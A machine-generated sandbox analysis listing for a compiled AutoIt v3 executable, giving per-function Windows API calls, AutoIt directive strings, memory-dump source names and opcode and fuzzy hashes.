                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 5d782454ef4d0180448527013755d2523f66e5fc327f68786c1d80a86620ac83
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f8b7596c9daf0cf449ec099d4cdbafb4be693b9bdeaa48314d03f681346fce8b
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D2E04F752043019BC700EF71C545A5BB7E4AF94314F108C6EF845A7351D775AC45CB66
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0043916A Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 0043918E
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: LogonUser
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1244722697-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 365ca9639b26e9c6c56151d88f527b1e4ffaee0f54dfd66c8778d151900be7f4
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 63114e5cfb2c4979e73f5d19eacf740c811f86df1a08bc2cb556a5e36cce81ff
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 365ca9639b26e9c6c56151d88f527b1e4ffaee0f54dfd66c8778d151900be7f4
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8DD0ECB52686066FD204CB24D846E2B77E9A7C4701F008A0CB196D2280C670D805CA32
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004711D2 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: NameUser
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2645101109-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b783c70369e54a54257db95ea8fbffa2a0b511f3d9d58af1a6b6f1143851980f
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 8011c19b6c32d183c263453b2018abc548473ce9ed5616c99acac4896e71f792
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b783c70369e54a54257db95ea8fbffa2a0b511f3d9d58af1a6b6f1143851980f
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F6E08C322083058FC310EF55F8405ABB390EB94311F004C3FE64AA2191DA79920EDFAB
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0042202E Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_00021FEC), ref: 00422033
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 299f58dbcf75cd09f1fee721c9404e411c3f17cf80a1a40ae63587de51767455
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 3275b40964251646410af8875a24301f93fa315c26af6adae0ca3d0f7a721f84
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 299f58dbcf75cd09f1fee721c9404e411c3f17cf80a1a40ae63587de51767455
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CD9002743511144A4A011BB16E5D90925D46A586067920875B411C4064DB9840019619
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00412C38 Relevance: .4, Instructions: 384COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: b3f199f19983f506b623bfe7955a95149e6efe4e98ce3416cc40fa12ddcf4508
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 46D19073C0A9B30A8735812D42582BFEE626FD578131EC3E29CD07F38AD26B5DA195D4
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00412818 Relevance: .4, Instructions: 378COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: c47bdb3f9c9e38c5d46ddb9e43dedaf70276048770aeb58bd274f21c588a824b
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1CD19073D1A9B30A8735852D42581AFEE626FD578031EC3E2CCD07F38AD16B5DA191D4
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0041240C Relevance: .4, Instructions: 361COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: ac15b8da1a4b082d71a0b082c8349c97121379a14580263daf363e6ab8f75410
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 87C18173C0A9B30A8736812D42641AFEE626FD579031FC3E2CCD47F38A91AB5DA195D4
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00412038 Relevance: .4, Instructions: 351COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: aa957cafbedeae1199dea6a597ba911d219650f283d164fb65797e90308ef47b
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5FC18E73D0A9B30A8735812D42581AFEE626FD578031EC3E28CE46F38ED26F5DA195D4
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00410D10 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 304d221b5688423ebfa6c473264aec07cdb78ae451f757bdd5acbbf2c1e92ad4
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: b8cfd58d412160527e66ace840abba843d94ac3f5b06779728c9fe736b8606cc
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 304d221b5688423ebfa6c473264aec07cdb78ae451f757bdd5acbbf2c1e92ad4
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ECD012F621844146F33144D866C0BD100437344310FB58C276005CEBC1C0DDECD6C229
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00459384 Relevance: 79.2, APIs: 41, Strings: 4, Instructions: 480filewindowcomCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 004593D7
                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 004593F1
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyWindow.USER32(?), ref: 00459407
                                                                                                                                                                                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 0045942A
                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000), ref: 00459431
                                                                                                                                                                                                                                                                                                                                                                                                                • SetRect.USER32(50000001,00000000,00000000,000001F4,?), ref: 00459568
                                                                                                                                                                                                                                                                                                                                                                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00459577
                                                                                                                                                                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,?,?,50000001,?,?,00000000,00000000), ref: 004595BB
                                                                                                                                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 004595C8
                                                                                                                                                                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 00459615
                                                                                                                                                                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(00000000,?,80000000,00000000,00000000,00000003,00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459635
                                                                                                                                                                                                                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459654
                                                                                                                                                                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 0045965F
                                                                                                                                                                                                                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00459668
                                                                                                                                                                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459678
                                                                                                                                                                                                                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0045967F
                                                                                                                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459686
                                                                                                                                                                                                                                                                                                                                                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,50000001,?,?,00000000,00000000,00000000), ref: 00459694
                                                                                                                                                                                                                                                                                                                                                                                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,000001F4), ref: 004596AD
                                                                                                                                                                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 004596C0
                                                                                                                                                                                                                                                                                                                                                                                                                • CopyImage.USER32(000000FF,00000000,00000000,00000000,00002000), ref: 004596EF
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000172,00000000,000000FF), ref: 00459712
                                                                                                                                                                                                                                                                                                                                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,50000001,?,?,00000000,00000000,00000000), ref: 0045973D
                                                                                                                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000004,?,50000001,?,?,00000000,00000000,00000000), ref: 0045974B
                                                                                                                                                                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000000,static,00000000,?,?,0000000B,0000000B,?,?,?,00000000,00000000), ref: 0045979C
                                                                                                                                                                                                                                                                                                                                                                                                                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004597AD
                                                                                                                                                                                                                                                                                                                                                                                                                • GetStockObject.GDI32(00000011), ref: 004597B7
                                                                                                                                                                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 004597BF
                                                                                                                                                                                                                                                                                                                                                                                                                • GetTextFaceW.GDI32(00000000,00000040,00000190,?,50000001,?,?,00000000,00000000,00000000), ref: 004597CD
                                                                                                                                                                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004597D6
                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteDC.GDI32(00000000), ref: 004597E1
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00459800
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscpy.LIBCMT ref: 0045981F
                                                                                                                                                                                                                                                                                                                                                                                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,00000190), ref: 004598BB
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 004598D0
                                                                                                                                                                                                                                                                                                                                                                                                                • GetDC.USER32(?), ref: 004598DE
                                                                                                                                                                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 004598EE
                                                                                                                                                                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00459919
                                                                                                                                                                                                                                                                                                                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00459925
                                                                                                                                                                                                                                                                                                                                                                                                                • MoveWindow.USER32(?,0000000B,?,?,?,00000001), ref: 00459943
                                                                                                                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,00000190), ref: 00459951
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4040870279-2373415609
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: d6fd8d7be04635d93ea84c38fc4cb072183cdb5133bdcfdddae5d23db1010fc6
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: fce7466cc8f2b4b34a2e278d60cb4f704f90ff1017bfb666dbfc83d8aba9d67a
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d6fd8d7be04635d93ea84c38fc4cb072183cdb5133bdcfdddae5d23db1010fc6
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F028C70204301EFD714DF64DE89F2BB7A8AB84705F104A2DFA45AB2D2D7B4E805CB69
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00403E50 Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 236COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __wcsnicmp
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1038674560-3360698832
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 87a66eadcaf8420a9e8e1157d1f7c7fd58aef90dc088af7a86e197dee8fb1ec4
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: b6083b7aed1673b33e689ff2aa7e8f17f47d7310e90ec65f4167159f85ee96f3
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 87a66eadcaf8420a9e8e1157d1f7c7fd58aef90dc088af7a86e197dee8fb1ec4
